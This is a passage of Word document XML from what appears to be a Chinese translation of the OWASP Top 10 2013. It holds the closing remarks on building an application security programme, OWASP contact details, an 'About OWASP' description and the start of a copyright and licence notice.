          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官们应该开始考虑如何管理</w:t>
      </w:r>
      <w:r w:rsidR="007C2D7F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>企业中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件应用程序的风</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E5A250" w14:textId="4EA5115E" w:rsidR="00474B07" w:rsidRDefault="00AC0468" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>险。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B81D383" w14:textId="77777777" w:rsidR="00AE3047" w:rsidRDefault="00AE3047" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从长远的角度来看，我们鼓励你建立一个兼容你们的文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB72F35" w14:textId="77777777" w:rsidR="000E711F" w:rsidRDefault="00AE3047" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>化与技术的</w:t>
      </w:r>
      <w:r w:rsidR="000E711F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全大纲</w:t>
      </w:r>
      <w:r w:rsidR="00CA5427">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="000E711F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些项目有大有小各不相同，所</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A938EBE" w14:textId="77777777" w:rsidR="000E711F" w:rsidRDefault="000E711F" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以你应该避免尝试去做一个规定了一切的流程模型。相</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B90E6E" w14:textId="4F377462" w:rsidR="000E711F" w:rsidRDefault="000E711F" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反你应该利用组织内的现有优势，寻找一个对你最适用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F508FFC" w14:textId="1D78C3B2" w:rsidR="00AE3047" w:rsidRDefault="000E711F" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF85350" w14:textId="17524FAC" w:rsidR="000E711F" w:rsidRDefault="000E711F" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们希望</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对你应用安全</w:t>
      </w:r>
      <w:r w:rsidR="00DC06BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的努力有所帮助，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC736A0" w14:textId="38F22571" w:rsidR="00DC06BD" w:rsidRDefault="00DC06BD" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你有一些问题、意见和想法，请马上联系我们：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C932669" w14:textId="485B184C" w:rsidR="00DC06BD" w:rsidRDefault="00DC06BD" w:rsidP="000E711F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公开方式：</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00071E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>owasp-topten@lists.owasp.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20787D5E" w14:textId="14B35678" w:rsidR="00F13059" w:rsidRDefault="00DC06BD" w:rsidP="00DC06BD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>私下联系：</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00071E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>dave.wichers@owasp.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FCBA40A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00AE3047">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FAD4B7B" w14:textId="323541F2" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0635637C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49364F8F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4396EDAD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1028DFB1" w14:textId="370164FC" w:rsidR="00F13059" w:rsidRDefault="00484849" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r w:rsidR="00810992">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1A349D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4711CF" w14:textId="77777777" w:rsidR="00856CB8" w:rsidRDefault="00856CB8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开放网络应用程序安全项目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(OWASP)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是一个致力于使组织能够</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAB2AB8" w14:textId="77777777" w:rsidR="00856CB8" w:rsidRDefault="00856CB8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开发、购买和维护可信任的应用程序的开放社区。在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OWASP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，你</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11184AF2" w14:textId="1792A88B" w:rsidR="00F13059" w:rsidRDefault="00856CB8" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/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会找到自有而开放的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFFE06E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5251D6D8" w14:textId="62FE6A3D" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="178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  </w:t>
      </w:r>
      <w:r w:rsidR="004E593A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>应用程序安全工具和标准</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ABF21D" w14:textId="068C3829" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="178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  </w:t>
      </w:r>
      <w:r w:rsidR="004E593A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>应用安全测试、安全代码开发和安全代码评审的完整书籍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3B1A06" w14:textId="7BDE7553" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="178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  </w:t>
      </w:r>
      <w:r w:rsidR="004E593A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>标准的安全控制和库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786237C9" w14:textId="0DFF09BD" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="178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  </w:t>
      </w:r>
      <w:r w:rsidR="004E593A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>本地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" w:history="1">
        <w:r w:rsidR="004E593A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="96"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>分会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" w:history="1">
        <w:r w:rsidR="004E593A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="96"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>万维网</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B031187" w14:textId="7292F34B" w:rsidR="00F13059" w:rsidRPr="006A4DCB" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="178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  </w:t>
      </w:r>
      <w:r w:rsidR="004E593A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>前沿技术</w:t>
      </w:r>
      <w:r w:rsidR="006A4DCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>研究</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC45D74" w14:textId="79D6704C" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="241" w:lineRule="exact"/>
        <w:ind w:firstLine="178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  </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="006A4DCB" w:rsidRPr="006A4DCB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="96"/>
            <w:sz w:val="19"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>广泛的全球会议</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B421D41" w14:textId="2508AD9B" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="178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  </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="006A4DCB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
            <w:noProof/>
            <w:color w:val="3A6331"/>
            <w:w w:val="96"/>
            <w:sz w:val="19"/>
          </w:rPr>
          <w:t>邮件列表</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12693908" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="178"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69BDA964" w14:textId="59B65A9D" w:rsidR="00F13059" w:rsidRDefault="006A4DCB" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/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查看更多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: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17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ttps://www.owasp.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C185817" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D6D2618" w14:textId="77777777" w:rsidR="00481C96" w:rsidRDefault="006D57C8" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>所有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>工具、文档、论坛和分会都是免费开放给那些对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F33DD31" w14:textId="77777777" w:rsidR="00481C96" w:rsidRDefault="006D57C8" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>提高应用程序安全性感兴趣的人的。我们提倡将应用程序安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55365601" w14:textId="078F9D38" w:rsidR="00481C96" w:rsidRDefault="006D57C8" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>看成是人、流程和技术的问题，因为改进所有这些领域</w:t>
      </w:r>
      <w:r w:rsidR="005E5F01">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>是最有效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E47B11" w14:textId="208E53DC" w:rsidR="00F13059" w:rsidRDefault="005E5F01" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>的提高应用程序安全性的方法</w:t>
      </w:r>
      <w:r w:rsidR="006D57C8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="93"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18520941" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8F24CB" w14:textId="77777777" w:rsidR="00481C96" w:rsidRDefault="00B7300C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OWASP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是一种新型组织，因为我们没有商业压力，所以我们</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB247F7" w14:textId="77777777" w:rsidR="00481C96" w:rsidRDefault="00B7300C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可以提供无偏见的、实用的、有成本效益的应用安全信息。尽</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF2EB3" w14:textId="77777777" w:rsidR="00481C96" w:rsidRDefault="00B7300C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管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OWASP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也支持使用商业安全技术，但并不附属于任何技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DDA4F1" w14:textId="77777777" w:rsidR="00481C96" w:rsidRDefault="00B7300C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公司。和其他开源软件项目一样，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OWASP</w:t>
      </w:r>
      <w:r w:rsidR="00331EC3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>通过协同、开放的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271AC976" w14:textId="2D0D79B5" w:rsidR="00F13059" w:rsidRDefault="00331EC3" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/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方式产生各种</w:t>
      </w:r>
      <w:r w:rsidR="00B7205F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>各样的</w:t>
      </w:r>
      <w:r w:rsidR="00B84FD3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>资料</w:t>
      </w:r>
      <w:r w:rsidR="00B84FD3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>(?)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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AF77FA" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7902EB85" w14:textId="77777777" w:rsidR="00481C96" w:rsidRDefault="00E46B0D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OWASP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基金会是一个非盈利的实体组织。</w:t>
      </w:r>
      <w:r w:rsidR="00C534F5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>这种性质保证了项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556924C6" w14:textId="77777777" w:rsidR="00481C96" w:rsidRDefault="00C534F5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目的</w:t>
      </w:r>
      <w:r w:rsidR="00B84FD3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>长期成功。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包括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OWASP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董事会、全球</w:t>
      </w:r>
      <w:r w:rsidR="00A85A14">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>委员会、分会领导、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C3A30" w14:textId="77777777" w:rsidR="00481C96" w:rsidRDefault="00A85A14" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr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项目领导和项目成员在内的所有人几乎都是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OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>的志愿者。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F45225" w14:textId="3C91393A" w:rsidR="00F13059" w:rsidRDefault="00A85A14" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/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我们通过提供赠款和基础设施来支持一些创新的安全研究。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45004F93" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F9973D" w14:textId="7F63ED97" w:rsidR="00F13059" w:rsidRDefault="00720D8F" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>快来加入我们吧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!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2BDB05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5545" w:space="0"/>
            <w:col w:w="5255" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167E432F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E41900" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="436" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9FCDF2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="320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Copyright and License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC988D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="166538AF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="229" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="2016"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Copyright © 2003 – 2013 The OWASP Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443C54C9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="2016"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598D7A3C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="2016"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="88"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>This document is released under the Creative Commons Attribution ShareAlike 3.0 license. For any reuse</w:t>
      </w:r>
    </w:p>
